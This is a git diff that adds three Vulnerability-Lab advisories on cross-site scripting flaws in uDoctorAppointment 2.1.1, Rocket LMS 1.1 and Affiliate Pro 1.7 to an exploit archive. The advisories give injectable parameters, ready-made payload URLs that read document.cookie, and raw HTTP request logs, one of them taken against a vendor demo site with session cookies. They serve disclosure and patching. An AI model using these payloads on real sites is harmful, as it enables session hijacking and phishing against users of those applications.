diff --git a/exploits/php/webapps/50676.txt b/exploits/php/webapps/50676.txt new file mode 100644 index 000000000..34b9b5e7d --- /dev/null +++ b/exploits/php/webapps/50676.txt @@ -0,0 +1,265 @@ +# Exploit Title: uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS) +# Exploit Author: Vulnerability-Lab +# Date: 15/12/2021 + +Document Title: +=============== +uDoctorAppointment v2.1.1 - Multiple XSS Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2288 + + +Release Date: +============= +2021-12-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2288 + + +Common Vulnerability Scoring System: +==================================== +5 + + +Vulnerability Class: +==================== +Cross Site Scripting - Non Persistent + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +Clinic management, doctor or therapist online medical appointment scheduling system for the management of health care. +uDoctorAppointment script allows doctors to register and appropriate membership plan with different features. +Patients can view doctor profiles before booking appointments. The site administrator or doctor may create and +manage advanced schedules, create working time slots for each day of the week, define time off etc. + +(Copy of the Homepage:https://www.apphp.com/codemarket/items/1/udoctorappointment-php-script ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple non-persistent cross site web vulnerabilities in the uDoctorAppointment script web-application. + + +Affected Product(s): +==================== +ApPHP +Product: uDoctorAppointment v2.1.1 - Health Care Script (PHP) (Web-Application) +Product: ApPHP MVC Framework v1.1.5 (Framework) + + +Vulnerability Disclosure Timeline: +================================== +2021-09-01: Researcher Notification & Coordination (Security Researcher) +2021-09-02: Vendor Notification (Security Department) +2021-09-10: Vendor Response/Feedback (Security Department) +2021-**-**: Vendor Fix/Patch (Service Developer Team) +2021-**-**: Security Acknowledgements (Security Department) +2021-12-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Pre Auth (No Privileges or Session) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +Multiple non-persistent cross site vulnerabilities has been discovered in the official uDoctorAppointment v2.1.1 script web-application. +The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser +to web-application requests from the client-side. + +The cross site security web vulnerabilities are located in the `created_at`, `created_date` and `sent_at` parameters of the `filter` web module. +The injection point is located in the parameters and the execution occurs in the filter module. The request method to inject the malicious script +code is GET and the attack vector of the vulnerability is non-persistent on client-side. + +Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects +to malicious source and non-persistent manipulation of affected application modules. + +Request Method(s): +[+] GET + +Vulnerable Module(s): +[+] ./doctorReviews/doctorReviews +[+] ./orders/orders +[+] /mailingLog/manage +[+] /orders/doctorsManage +[+] /news/manage +[+] /newsSubscribers/manage +[+] /doctorReviews/manage/status/approved +[+] /appointments/manage + +Vulnerable Parameter(s): +[+] created_at +[+] created_date +[+] sent_at +[+] appointment_date + +Affected Module(s): +[+] Filter + + +Proof of Concept (PoC): +======================= +The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction. +For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue. + + +Exploitation: Payload +">%20 + + +Role: Patient (Frontend - created_at) +https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=2021-09-08&but_filter=Filter +- +https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter + + +Role: Doctor (Frontend - created_date) +https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=2021-09-08&status=2&but_filter=Filter +- +https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=2&but_filter=Filter + + +Role: Admin (Backend - +https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=2021-09-01&status=0&but_filter=Filter +https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=2021-09-01&doctor_id=1&status=1&but_filter=Filter +https://doctor-appointment.localhost:8080/news/manage?news_header=test1&created_at=2021-09-01&but_filter=Filter +https://doctor-appointment.localhost:8080/newsSubscribers/manage?first_name=test1&last_name=test2&email=test%40aol.com&created_at=2021-09-01&but_filter=Filter +https://doctor-appointment.localhost:8080/doctorReviews/manage/status/approved?doctor_first_name%2Cdoctor_last_name=test1&patient_name=test2&created_at=2021-09-01&but_filter=Filter +https://doctor-appointment.localhost:8080/appointments/manage?appointment_number=test1&patient_first_name%2Cpatient_last_name=test2&doctor_first_name%2Cdoctor_last_name=test3&appointment_date=2021-09-01&but_filter=Filter +https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=2021-09-01&doctor_id=1&status=1&but_filter=Filter +- +https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=0&but_filter=Filter +https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&doctor_id=1&status=1&but_filter=Filter +https://doctor-appointment.localhost:8080/news/manage?news_header=test1&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter +https://doctor-appointment.localhost:8080/newsSubscribers/manage?first_name=test1&last_name=test2&email=test%40aol.com&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter +https://doctor-appointment.localhost:8080/doctorReviews/manage/status/approved?doctor_first_name%2Cdoctor_last_name=test1&patient_name=test2&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter +https://doctor-appointment.localhost:8080/appointments/manage?appointment_number=test1&patient_first_name%2Cpatient_last_name=test2&doctor_first_name%2Cdoctor_last_name=test3&appointment_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter +https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&doctor_id=1&status=1&but_filter=Filter + + +Vulnerable Source: ./mailingLog +
+
+Subject: +Content: +From: +To: +Date Sent: +... +" name="sent_at" />Status:
+--
      +
    + + +
    + + +--- PoC Session Logs (GET) --- +https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=a&email_content=b&email_from=c&email_to=d&sent_at=>"++&status=&but_filter=Filter +Host: doctor-appointment.localhost:8080 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Connection: keep-alive +Cookie: isOpened=menu-04; apphp_9tmmw0krko=g2234alc8h8ks3ms2nsbp4tsa9 +- +GET: HTTP/1.1 200 OK +Server: Apache +Content-Length: 2914 +Connection: Keep-Alive +Content-Type: text/html; charset=utf-8 + + +Reference(s): +https://doctor-appointment.localhost:8080/ +https://doctor-appointment.localhost:8080/mailingLog/ +https://doctor-appointment.localhost:8080/news/manage +https://doctor-appointment.localhost:8080/order/manage +https://doctor-appointment.localhost:8080/mailingLog/manage +https://doctor-appointment.localhost:8080/appointments/manage +https://doctor-appointment.localhost:8080/orders/doctorsManage +https://doctor-appointment.localhost:8080/newsSubscribers/manage + + +Solution - Fix & Patch: +======================= +The vulnerability can be resolved by a filter or secure encode of the vulnerable created_date, appointment_date, sent_at and create_at parameters. +Disallow the usage of special chars in the affected parameters on get method requests. +Sansitize the vulnerable output location to resolve the point of execution in the filter module. + + +Credits & Authors: +================== +Vulnerability-Lab [RESEARCH TEAM] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. + +Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com +Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + +Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY (VULNERABILITY LAB) +RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE \ No newline at end of file diff --git a/exploits/php/webapps/50677.txt b/exploits/php/webapps/50677.txt new file mode 100644 index 000000000..c81be9e90 --- /dev/null +++ b/exploits/php/webapps/50677.txt @@ -0,0 +1,236 @@ +# Exploit Title: Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS) +# Exploit Author: Vulnerability-Lab +# Date: 29/12/2021 + +Document Title: +=============== +Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS) + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2305 + + +Release Date: +============= +2021-12-29 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2305 + + +Common Vulnerability Scoring System: +==================================== +5.4 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +Rocket LMS is an online course marketplace with a pile of features that helps you to run your online education business easily. +This product helps instructors and students to get in touch together and share knowledge. Instructors will be able to create +unlimited video courses, live classes, text courses, projects, quizzes, files, etc and students will be able to use the +educational material and increase their skill level. Rocket LMS is based on real business needs, cultural differences, +advanced user researches so the product covers your business requirements efficiently. + +(Copy of the Homepage:https://lms.rocket-soft.org/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the Rocket LMS v1.1 cms. + + +Affected Product(s): +==================== +Rocketsoft +Product: Rocket LMS v1.1 - eLearning Platform CMS (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2021-09-03: Researcher Notification & Coordination (Security Researcher) +2021-09-04: Vendor Notification (Security Department) +2021-**-**: Vendor Response/Feedback (Security Department) +2021-**-**: Vendor Fix/Patch (Service Developer Team) +2021-**-**: Security Acknowledgements (Security Department) +2021-12-29: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (User Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in the official Rocket LMS v1.1 cms web-application. +The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise +browser to web-application requests from the application-side. + +The vulnerability is located in the support ticket message body. The message body does not sanitize the input of message. +Remote attackers with low privileged application user accounts are able to inject own malicious script code with persistent +attack vector. The request method to inject is post. After the inject the message a displayed again for the user and the +backend for the support (admin). The issue can be exploited by organization, student and instructor account roles. + +Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external +redirects to malicious source and persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] conversations Support - New Ticket + +Vulnerable Input(s): +[+] Subject + +Vulnerable Parameter(s): +[+] title + +Affected Module(s): +[+] Messages History + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. +For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. + + +PoC: Payload + + + +--- PoC Session Logs (POST) --- +https://lms.rocket-soft.org/panel/support/store +Host: lms.rocket-soft.org +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Content-Type: application/x-www-form-urlencoded +Content-Length: 271 +Origin:https://lms.rocket-soft.org +Connection: keep-alive +Referer:https://lms.rocket-soft.org/panel/support/new +Cookie: webinar_session=eyJpdiI6ImNUeG9hcmFEbXFUSGxZd0NOZ3J6R0E9PSIsInZhbHVlIjoiWXFSOGRXYWFHcUUvc0VuNUpzanhBZjdBc21lRy8xaEhTU0hQTnk2YWlJM1ZHYkxXdzc3 +T3U2Nm9yMEI3b2o2QmtCT2NjdEkyRVNwdlhWUjgwY0ZHWkNyVHJSdnBCck8vVWo4MFVsK2JvLzRDUm1BRm5zU2Y0SWZWdGR1b29keWwiLCJtYWMiOiIxODI3NDQ2OTcxZDMwNjA0M2U0 +OGM3YzZmNmMzM2Y1OTk5ZTNiZTIzY2E2ZGQxMTlkYzY2YzY0Y2M5OTI5MTc5In0%3D; TawkConnectionTime=0; __tawkuuid=e::lms.rocket-soft.org::W9t6jOO76CukDtw +wAughTc4sTzqsd2xAqZJpiyabjsp3sI9le/SuCBxWz7ekNzR0::2; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6Ik9iUEZFNlZBYjJSOEVjSE1hRlNiZFE9PSIsInZhbHVlIjoiR3F1RWFsb01KREQ2K05FaG5MT1hST1 +pYNmx3Z3ZoU2lDOXBQL3h3aVg0T2k2a1YwVDZYR25nUnNCOXhsWjZnWjcrQTJxUzhEa3k2N1VEdjZkZGJFMXg3Q0pIWGx6VUZwajJGc09DdUlzaFpwb0t2SHJoaHkvQmh3bTJPM0RlWVh +SRGszUlRqUVJNdlErMXpXYU5hZWlySWVrMktwZmp4RzNMSXV2TnAzTlFpQUhRalNKSmw2elhzVURqWVpqQlpkajAvUzBPcTV0Z0tXaFRFNkpmLy94TkFxa3dxdjlnOWk4VWpSRzMzeUVa +UT0iLCJtYWMiOiJkMmQ3ZTk4NzllOTQ3ZTU4ZGRjMTljMjlkMzRkODhjMmI0Mzk5MjM1ZmJlYTc1NTAxYzI2OGI3YmMwMDczMmQxIn0%3D +_token=3CmMP45TwUNoeNVPzZ4JuGunKoFqcUxbDWliz9rg&title=test1">&type=course_support&webinar_id=1996&message=test2&attach= +- +POST: HTTP/1.1 302 Found +Server: Apache/2 +X-Powered-By: PHP/7.4.20 +Location:https://lms.rocket-soft.org/panel/support +Set-Cookie: +webinar_session=eyJpdiI6Im5OVER1cno1OXJmQnRRb3QycHExN1E9PSIsInZhbHVlIjoiOGxXdHV5em95bGh0ejh3MXlRT3dwSXFGcUZzSmMzbHlJd2xFRDhweEFBS25JeFFrMzF2Wn +lLdHc0MUpFQmN1cDY3SUE1V0hwVGRDUGZvRkRYZVYvY01BZ2NxT1NJWThXQnRiNnR3SDJ4TEZ5Q3BQUnZhR1lxUHZnR2hhLzEzSysiLCJtYWMiOiI1YjBlMmVjMjYwYjEzODVhZTJmZWZj +YTlmMGJjMThkYzQ0ZjVmNjI0NTA1MGMxM2Q3ZGVlYjlhOGJkZTY3NmM0In0%3D; Max-Age=7200; path=/; httponly; samesite=lax +Vary: Accept-Encoding,User-Agent +Content-Encoding: gzip +Access-Control-Allow-Origin: * +Access-Control-Allow-Headers: origin, x-requested-with, content-type +Access-Control-Allow-Methods: PUT, GET, POST, DELETE, OPTIONS +Content-Length: 210 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +Vulnerable Source: conversations Support - New Ticket - Messages History +
    +
    +
    +
    + +
    +
    +Cameron Schofield +user +
    +
    +2021 Sep 9 | 12:58 +
    +

    "

    +
    + + +Reference(s): +https://lms.rocket-soft.org/ +https://lms.rocket-soft.org/panel/ +https://lms.rocket-soft.org/panel/support +https://lms.rocket-soft.org/panel/support/new +https://lms.rocket-soft.org/panel/support/[id]/conversations + + +Credits & Authors: +================== +Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. + +Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com +Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + +Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY (VULNERABILITY LAB) +RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE \ No newline at end of file diff --git a/exploits/php/webapps/50678.txt b/exploits/php/webapps/50678.txt new file mode 100644 index 000000000..9c46bef10 --- /dev/null +++ b/exploits/php/webapps/50678.txt @@ -0,0 +1,223 @@ +# Exploit Title: Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS) +# Exploit Author: Vulnerability-Lab +# Date: 05/01/2022 + +Document Title: +=============== +Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2281 + + +Release Date: +============= +2022-01-05 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2281 + + +Common Vulnerability Scoring System: +==================================== +5.1 + + +Vulnerability Class: +==================== +Cross Site Scripting - Non Persistent + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +Affiliate Pro is a Powerful and yet simple to use PHP affiliate Management System for your new or existing website. Let affiliates +sell your products, bring you traffic or even leads and reward them with a commission. More importantly, use Affiliate Pro to track +it intelligently to keep your affiliates happy and also your bottom line! So how does it work? It is pretty simple, when a user visits +your website through an affiliate URL the responsible affiliate sending the traffic to you will receive a commission based on your settings. + +(Copy of the Homepage:https://jdwebdesigner.com/ &https://codecanyon.net/item/affiliate-pro-affiliate-management-system/12908496 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple reflected cross site scripting web vulnerabilities in the Affiliate Pro - Affiliate Management System v1.7. + + +Affected Product(s): +==================== +jdwebdesigner +Product: Affiliate Pro v1.7 - Affiliate Management System (PHP) (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2021-08-22: Researcher Notification & Coordination (Security Researcher) +2021-08-23: Vendor Notification (Security Department) +2021-08-30: Vendor Response/Feedback (Security Department) +2021-**-**: Vendor Fix/Patch (Service Developer Team) +2021-**-**: Security Acknowledgements (Security Department) +2022-01-05: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (Guest Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +Multiple reflected cross site scripting web vulnerabilities has been discovered in the Affiliate Pro - Affiliate Management System v1.7. +The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise client-site +browser to web-application requests. + +The non-persistent cross site scripting web vulnerabilities are located in the `email`,`username` and `fullname` parameters of the `index` module. +Attackers are able to inject own malicious script code to the `Fullname`,`Username` or `Email` input fields to manipulate client-side requests. +The request method to inject is post and the attack vector is non-persistent (reflected) on client-side. The injection- and execution points are +located in the index formular for affiliates to enter. + +Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to +malicious source and non-persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] index + +Vulnerable Input(s): +[+] Email +[+] Username +[+] Fullname + +Vulnerable Parameter(s): +[+] email +[+] username +[+] fullname + + +Proof of Concept (PoC): +======================= +The client-side cross site scripting web vulnerability can be exploited by remote attackers without account and with low or medium user interaction. +For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. + + +Exploitation: Payload + +%3cscript%3ealert(1337)%3c%2fscript%3 + + +--- PoC Session Logs (POST) --- +POST /affiliate-pro-demo/index HTTP/1.1 +Host: affiliates-pro.localhost:8000 +Origin:http://affiliates-pro.localhost:8000 +Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24 +Referer:http://affiliates-pro.localhost:8000/affiliate-pro-demo/ +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Accept: */* +- +fullname= +&username=@pwnd.coml00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv +&p=test&confirmpwd=j2B%21p5o%21K8 +- +HTTP/1.1 200 OK +Server: Apache +Set-Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24; path=/; HttpOnly +Connection: Upgrade, close +Vary: Accept-Encoding +Content-Length: 6549 +Content-Type: text/html; charset=UTF-8 + + +Vulnerable Source: Index +
    + +
    +" required="required"> +
    +
    +
    + +
    +" required> +
    +
    +
    + +
    +" required> +
    + + +Security Risk: +============== +The security risk of the client-side cross site scripting vulnerabilities in the web-application are estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. + +Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com +Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + +Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY (VULNERABILITY LAB) +RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index df690d1ec..63127a09f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44755,3 +44755,6 @@ id,file,description,date,author,type,platform,port 50673,exploits/php/webapps/50673.txt,"Simple Chatbot Application 1.0 - 'message' Blind SQLi",1970-01-01,"Saud Alenazi",webapps,php, 50674,exploits/aspx/webapps/50674.txt,"Nyron 1.0 - SQLi (Unauthenticated)",1970-01-01,"Miguel Santareno",webapps,aspx, 50675,exploits/hardware/webapps/50675.txt,"Creston Web Interface 1.0.0.2159 - Credential Disclosure",1970-01-01,"RedTeam Pentesting GmbH",webapps,hardware, +50676,exploits/php/webapps/50676.txt,"uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php, +50677,exploits/php/webapps/50677.txt,"Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php, +50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,